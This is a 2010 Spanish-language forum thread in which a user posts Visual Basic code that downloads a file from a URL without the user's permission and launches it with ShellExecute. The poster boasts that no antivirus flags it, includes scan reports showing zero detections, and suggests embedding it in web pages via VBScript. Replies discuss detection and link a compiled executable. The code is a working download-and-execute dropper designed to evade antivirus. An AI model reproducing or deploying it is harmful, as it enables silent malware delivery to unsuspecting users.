Test Foro de elhacker.net SMF 2.1

El código es pequeño pero logra que no salte ningún Antivirus cuando se descarga un archivo sin permiso.

Ademas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript



'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
' //                                                            //
' // Web: http://InfrAngeluX.Sytes.Net/                         //
' //                                                            //
' // |-> Pueden Distribuir Este Código siempre y cuando         //
' // no se eliminen los créditos originales de este código      //
' // No importando que sea modificado/editado o engrandecido    //
' // o achicado, si es en base a este código                    //
' ////////////////////////////////////////////////////////////////
Option Explicit
Function DescargarArchivo(strDowload As String, SaveOn As String) As Long
On Error GoTo 1:
Dim xml                     As Object
Dim adoStream               As Object
   Set xml = CreateObject("Microsoft.XMLHTTP")
   Set adoStream = CreateObject("Adodb.Stream")
   Call xml.Open("GET", strDowload, 0)
   Call xml.Send
   adoStream.Type = 1
   Call adoStream.Open
   Call adoStream.write(xml.responseBody)
   Call adoStream.SaveToFile(SaveOn, 2)
   Call adoStream.Close
   DescargarArchivo = 1
Exit Function
1:
End Function



Código del proyecto con el cual realice en el Scan.



Option Explicit
Sub main()
   If CBool(DescargarArchivo("http://www.goear.com/files/sst2/mp3files/15102006/cfebd49f1b5ba43867cc687896a32ecd.mp3", "c:\aaa.mp3")) Then
       Call vbShell("c:\aaa.mp3", False)
   End If
End Sub
'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
' //                                                            //
' // Web: http://InfrAngeluX.Sytes.Net/                         //
' //                                                            //
' // |-> Pueden Distribuir Este Código siempre y cuando         //
' // no se eliminen los créditos originales de este código      //
' // No importando que sea modificado/editado o engrandecido    //
' // o achicado, si es en base a este código                    //
' ////////////////////////////////////////////////////////////////
Function vbShell(StrPath As String, visible As Long) As Long
Dim ret                     As Object
   Set ret = CreateObject("Shell.Application", "")
   Call ret.ShellExecute(StrPath, "", "", "open", visible)
End Function




lo he probado en un proyecto pequeño miren.

Gracias The Swash por el scan aunq que yo ya lo habia realizado xP

File Info

Report generated: 12.1.2010 at 0.41.15 (GMT 1)
Filename: Project1.exe
File size: 20480 bytes
MD5 hash: d64d53fa4ec3bcafb9ff781303188fb7
SHA1 hash: 62157077EA4D3C17B1988D72F69F8C9502F0026E
Detection rate: 0 on 24
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)


Virus total

Antivirus   Version   Last Update   Result
a-squared   4.5.0.48   2010.01.12   -
AhnLab-V3   5.0.0.2   2010.01.11   -
AntiVir   7.9.1.134   2010.01.11   -
Antiy-AVL   2.0.3.7   2010.01.11   -
Authentium   5.2.0.5   2010.01.12   -
Avast   4.8.1351.0   2010.01.11   -
AVG   9.0.0.725   2010.01.11   -
BitDefender   7.2   2010.01.12   -
CAT-QuickHeal   10.00   2010.01.11   -
ClamAV   0.94.1   2010.01.12   -
Comodo   3550   2010.01.11   -
DrWeb   5.0.1.12222   2010.01.12   -
eSafe   7.0.17.0   2010.01.11   -
eTrust-Vet   35.2.7231   2010.01.12   -
F-Prot   4.5.1.85   2010.01.12   -
F-Secure   9.0.15370.0   2010.01.12   -
Fortinet   4.0.14.0   2010.01.12   -
GData   19   2010.01.12   -
Ikarus   T3.1.1.80.0   2010.01.12   -
Jiangmin   13.0.900   2010.01.11   -
K7AntiVirus   7.10.944   2010.01.11   -
Kaspersky   7.0.0.125   2010.01.12   -
McAfee   5858   2010.01.11   -
McAfee+Artemis   5858   2010.01.11   -
McAfee-GW-Edition   6.8.5   2010.01.12   -
Microsoft   1.5302   2010.01.11   -
NOD32   4762   2010.01.11   -
Norman   6.04.03   2010.01.11   -
nProtect   2009.1.8.0   2010.01.11   -
Panda   10.0.2.2   2010.01.11   -
PCTools   7.0.3.5   2010.01.12   -
Prevx   3.0   2010.01.12   -
Rising   22.30.01.01   2010.01.12   -
Sophos   4.49.0   2010.01.12   -
Sunbelt   3.2.1858.2   2010.01.12   -
Symantec   20091.2.0.41   2010.01.12   -
TheHacker   6.5.0.3.147   2010.01.12   -
TrendMicro   9.120.0.1004   2010.01.11   -
VBA32   3.12.12.1   2010.01.12   -
ViRobot   2010.1.12.2131   2010.01.12   -
VirusBuster   5.0.21.0   2010.01.11   -

Dulces Lunas!¡.

Orale esta bien el código y lo interesante es lo que comentas, seria una buena opcion linkear el tema a subforo de malware ya que ahi es donde mas interesa.

Saludos

http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)

Muy bueno...^^

salu2!

Cita de: Karcrack en 12 Enero 2010, 07:53 AM

Código [Seleccionar] Expandir

http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)

JAJAJA ni lo vi xp solo estaba leyendo algo de javascript y despues me fui a exploits y me dio una idea y el resultado arriba esta xP.

Dulces Lunas!¡.

Está muy bueno BlackZerox!

no hay nada como el AsyncDownload de los usercontrol... :)

Cita de: seba123neo en 13 Enero 2010, 03:09 AM
no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.

Cita de: ░▒▓BlackZeroҖ▓▒░ en 13 Enero 2010, 05:16 AM

Cita de: seba123neo en 13 Enero 2010, 03:09 AM
no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.

Cobein:
http://foro.elhacker.net/programacion_vb/ucdownload_source-t222454.0.html

Buenas

No quiero ser "duro" con la crítica, pero el método en si no es para nada nuevo, y de hecho, en el foro hay otros tantos códigos iguales a ese (en M$ support desde 2004 o antes).

CitarAdemas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript

Solo IE acepta vbs, aunque el mismo código puede portarse a javascript, y tampoco tan así ... http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html

Por otra parte, alguien lo ha probado con el KIS? porque incrustado en un VBS/HTML es por demás detectado, y en VB debería de ser detectado por heurística.
:http://www.virustotal.com/analisis/697e756e37c60a3f077883ec8da0f21aec6f6f63773facfd4ca7ef0e639de21d-1263471785

Saludos

Cita de: Novlucker en 14 Enero 2010, 13:26 PM

:http://www.virustotal.com/analisis/697e756e37c60a3f077883ec8da0f21aec6f6f63773facfd4ca7ef0e639de21d-1263471785

Saludos

Vovi a compilar aquí dejo el proyecto que use y su exe compilado que subí, esta limpio la heurística ni salta por ningún motivo, por otra parte indague mas y ya vi eso que mencionas xP, para a otra reviso ejemplos y cosas DESPUÉS de crear y ANTES de postearlo, pero aun asi esta cosa me salio de asi desde cero y lo de duro a no por mi no hay problema mi consciencia esta limpia.

Descargar EXE y Source del mismo (http://infrangelux.sytes.net/Descargas/Sourcecode/bin.rar)

El reporte de este EXE.

http://www.virustotal.com/analisis/70c2588764f5f6f579aa60d0e2443e0b566d265840d75a3a02926dcfa82bdbb8-1263769885

Dulces Lunas!¡.